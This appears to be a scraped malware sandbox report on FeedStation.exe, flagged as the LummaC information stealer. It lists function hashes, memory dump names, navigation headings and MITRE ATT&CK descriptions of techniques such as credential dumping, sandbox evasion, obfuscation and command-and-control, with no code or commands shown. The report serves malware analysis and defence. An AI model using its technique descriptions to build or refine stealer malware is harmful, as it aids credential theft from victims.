Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd80f3abcf802734e81028c070e806ed95269a3a6cfa6fc66826b029dfd3c6a
Instruction ID: 7f23212b9dae8c1291c18bd314508e2adf71771b0201308af242376ec114ca0d
Opcode Fuzzy Hash: cdd80f3abcf802734e81028c070e806ed95269a3a6cfa6fc66826b029dfd3c6a
Instruction Fuzzy Hash: F00184F170034147EB20EE65C8C0B27B6EA7F91704F19443CEA5557280EB75EC058BA9

Function 025055B2 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67c80c0d901ee6460d89e9790744841cb8839dbfd38e993d3001ee0e12080132
Instruction ID: 410a8a44366e42de868f29503af23c19718f8f7fda1f00b2e379c60fb2f0d872
Opcode Fuzzy Hash: 67c80c0d901ee6460d89e9790744841cb8839dbfd38e993d3001ee0e12080132
Instruction Fuzzy Hash: 6011E536705600DBC718CF24CCA193FB7A3BBC6214F5A963CD19623260E731E8018F99

Function 0251C131 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18d82645edc03947ff54298a386254faed4c1d40806770f25fe444f2b566c533
Instruction ID: 5b3249fbde4a8817c419542d4a176e07d0b06a83ea3068dbbed0b725112452de
Opcode Fuzzy Hash: 18d82645edc03947ff54298a386254faed4c1d40806770f25fe444f2b566c533
Instruction Fuzzy Hash: E801DAF4C41208BFCB90EFA9DD43A9EBE79EB4A250F14412AF444A7245D331491A8FE7

Function 0251D142 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cf7fde9b1a1620b7684a0eeb54d29f83c9e382eaca1b256dd6760459bbd6f2f
Instruction ID: 4b375dc95f47ed8430550b22e53bed9e317e5dd06db61c7fdfd737d0b918c2e7
Opcode Fuzzy Hash: 2cf7fde9b1a1620b7684a0eeb54d29f83c9e382eaca1b256dd6760459bbd6f2f
Instruction Fuzzy Hash: BDF0F632C152A08FC708DB28CC70A6B7BB9AAC6604F15862CE8C6D7641D7359915CEDC

Function 024E10D5 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction ID: 40a5f10f990bfbd46b6fd5aaf59204bf16b4a5f2a64eb1421868b38a8215e270
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: 9601FB34A41108EFDF15DF94C594AADF7B2FB48311F20829AD80A5B785C330AF41DB50

Function 0251DA7A Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b39ba5dedc6d2c5ccd99419d898c12ca8398477d6c2e0ae2ec3b75e706bb8d37
Instruction ID: ce74e8f6f99b38fb659f68a66e4a7c74abf6140a027235958b8357afd0741246
Opcode Fuzzy Hash: b39ba5dedc6d2c5ccd99419d898c12ca8398477d6c2e0ae2ec3b75e706bb8d37
Instruction Fuzzy Hash: F8E09239C4922A8ADB20DE0084D02F6F270FB02758FC81429DCC627180E7749A85D24D

Function 024ECFCA Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cd66204bbe693966c2e87fd7893884149b89ecf7d2efade1afa97aeac904fa7
Instruction ID: c99d48f6a12eb4efb9c0d5e81e85304776c0f5e439bbb2ec701720f7a1c445d2
Opcode Fuzzy Hash: 5cd66204bbe693966c2e87fd7893884149b89ecf7d2efade1afa97aeac904fa7
Instruction Fuzzy Hash: DAF06D78804701DFDB118F65EC44916BBB6FF86301B108925FC5697230C731E842CF18

Function 025072D1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4723405d480c527835cd09d5f1a1d2fc7f8dd7596131a7e20133ef63a8b6e26
Instruction ID: d2dbdfa0efb212cc58587adcd9fb7111b4cb3b22aa5ad99f6b68895c0e013d0b
Opcode Fuzzy Hash: a4723405d480c527835cd09d5f1a1d2fc7f8dd7596131a7e20133ef63a8b6e26
Instruction Fuzzy Hash: 5BD05E40A0CA83C74B094EDD18E1331EB677B1F20571854B9A8E1AB4C3C786E456851C

Function 024ECEAF Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d0d2d9e848a1add9e813e5a922b71bc853dc7972e9a113f041cb24f8786120f
Instruction ID: 4982bb21cc84cabf780aae93a071ff52b577ba96d7ef4ccda927ba07f343daaf
Opcode Fuzzy Hash: 4d0d2d9e848a1add9e813e5a922b71bc853dc7972e9a113f041cb24f8786120f
Instruction Fuzzy Hash: D5E012B8904B02DFD711CF69E884A16BBB6FF9A301F108925E85A97320D730E842CF19

Function 024ED0B1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1af40a913f7c47b13a0f5b19677460d3fc6a6bc076506e07f04f546dca7c6ac2
Instruction ID: 6bb70803dda8588c8c52cc7a4c7d4147d2e0bef7d1b8590259a495aea4bcf373
Opcode Fuzzy Hash: 1af40a913f7c47b13a0f5b19677460d3fc6a6bc076506e07f04f546dca7c6ac2
Instruction Fuzzy Hash: 35E09A78914700DFDB258F25D844826BBB9FB863067109865FC5757660C731E842DF58

Function 024FC5ED Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29598aafd6c10ec109047cb5288dd48ab5ea7344158e945e5663cd9dc2fc3f0b
Instruction ID: 6dda496533fdb9c77428ae668cd7c027fa5a0983bf08e06cc6708a73fff7f641
Opcode Fuzzy Hash: 29598aafd6c10ec109047cb5288dd48ab5ea7344158e945e5663cd9dc2fc3f0b
Instruction Fuzzy Hash: 56D017B9B86200AFD7068F15DD42655B762FBCA210B49D038E808D3324DA38D801CB0A

Function 02506159 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0e580c484e81291c750123e15489df83d03ba1a02b2079b528a7238087ebd9
Instruction ID: 8dbcb78827ba80f1c7299fa9b841523be9ef42ad76a00d8f245bd284fc3a5af3
Opcode Fuzzy Hash: 6d0e580c484e81291c750123e15489df83d03ba1a02b2079b528a7238087ebd9
Instruction Fuzzy Hash: AD900264D481418A9100EF049440470E2F8620B502F103450B008F3012C311D508450C

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FeedStation.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
FeedStation.exe

Function 024E0E75 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Function 024E0D25 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Function 024E0765 Relevance: 1.9, APIs: 1, Instructions: 399
threadCOMMON

Function 0252E67A Relevance: 6.1, APIs: 4, Instructions: 99
memoryCOMMON

Function 0252F4EA Relevance: 4.8, APIs: 3, Instructions: 325
memoryCOMMON

Function 02530898 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Function 0252E775 Relevance: 3.0, APIs: 2, Instructions: 48
memoryCOMMON

Function 025152DD Relevance: 72.9, Strings: 58, Instructions: 393
COMMON

Function 02516021 Relevance: 39.0, Strings: 31, Instructions: 289
COMMON

Function 02504962 Relevance: 31.7, Strings: 25, Instructions: 474
COMMON